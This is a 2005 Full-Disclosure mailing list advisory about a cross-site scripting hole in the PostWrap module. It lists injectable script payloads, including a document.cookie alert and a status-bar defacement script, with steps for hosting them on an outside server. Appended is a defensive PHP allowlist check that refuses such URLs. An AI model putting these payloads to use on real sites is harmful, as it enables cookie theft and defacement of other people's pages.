[Full-Disclosure] XSS VULNERABILITY AT MODULE PostWrap
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] XSS VULNERABILITY AT MODULE PostWrap
- From: "hio hou" <asckbg@xxxxxxxxxxx>
- Date: Tue, 08 Feb 2005 13:54:59 +0000
Hello, Albania Security Clan has just discovered an XSS-type vulnerability in the PostWrap module. The problem is at /index.php?module=PostWrap&page=http://hostename.com/HACK/asc/ascmd.txt. It is not a PHP injection, because that is protected, but XSS commands, JavaScript, can be injected; take a look:

This is an example of code that can be injected:

    <script>alert("COOKIE and HOSTNAME")</script>
    <script>alert(document.cookie)</script>
    <script>alert(document.hostname)</script>
    <script>alert("Long LIVE Ethnic ALBANIA")</script>
    <SCRIPT language=JavaScript>
    <!--
    /* status */
    function one()
    {window.status = ".-*'^'*-.,_,.-*'^'*-[ - - - - - - ]=[> ALBANIA SECURITY CLAN XXS VULNERABILITY AT MODULE PostWrap <]=[ - - - - - - ]-*'^'*-.,_,.-*'^'*-. ";
    setTimeout("two()",60);
    }
    function two()
    {window.status = ".-*'^'*-.,_,.-*'^'*-[ - - - - - - ]=[> ALBANIA SECURITY CLAN XXS VULNERABILITY AT MODULE PostWrap <]=[ - - - - - - ]-*'^'*-.,_,.-*'^'*-. ";
    setTimeout("three()",120);
    }
    function three()
    {window.status = ".-*'^'*-.,_,.-*'^'*-[ - - - - - - ]=[> ALBANIA SECURITY CLAN XSS VULNERABILITY AT MODULE PostWrap <]=[ - - - - - - ]-*'^'*-.,_,.-*'^'*-. ";
    setTimeout("one()",180);
    }
    one();
    // -->
    </SCRIPT>

Then you put this source code in a .txt file and upload it to a website (server) to be able to inject it.

Best regards from Albania.

www.albanianhaxorz.org | irc.gigachat.net #ASC
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
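
A server-side check that would refuse the request shown in the message above, as an added example (not code from the post or from PostWrap). It assumes the module receives the `page` value as a URL to wrap; the function name, the allowlisted hosts and the sample inputs are hypothetical.

```php
<?php
// Added example: exact-host allowlist for a wrapped-page URL parameter.
// Names and hosts below are constructed for illustration, not PostWrap's own.
const WRAP_ALLOWED_HOSTS = ['docs.example.org', 'status.example.org'];

/** Return the URL if it may be wrapped, or null to refuse it. */
function wrap_target_or_null(string $page): ?string
{
    // Refuse empty values, whitespace and control characters.
    if ($page === '' || preg_match('/[\x00-\x20\x7f]/', $page)) {
        return null;
    }
    $parts = parse_url($page);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null; // relative or malformed values are not wrapped
    }
    $scheme = strtolower($parts['scheme']);
    if ($scheme !== 'http' && $scheme !== 'https') {
        return null; // only web schemes are wrapped
    }
    if (isset($parts['user']) || isset($parts['pass'])) {
        return null; // userinfo makes the real host easy to misread
    }
    $host = strtolower(rtrim($parts['host'], '.'));
    if (!in_array($host, WRAP_ALLOWED_HOSTS, true)) {
        return null; // exact match only, no suffix or substring matching
    }
    return $page;
}

// Constructed sample values for the `page` parameter; the second is the
// form shown in the advisory.
$samples = [
    'https://docs.example.org/guide.html',
    'http://hostename.com/HACK/asc/ascmd.txt',
    'https://docs.example.org.other.example/guide.html',
    'https://docs.example.org@other.example/',
];
foreach ($samples as $s) {
    $verdict = wrap_target_or_null($s) === null ? 'REFUSE' : 'WRAP  ';
    // Encode the value whenever it is echoed back into a page or log view.
    echo $verdict, ' ', htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), "\n";
}
```

Only the first sample is accepted; the other three are refused because the host is not on the list or the URL carries userinfo.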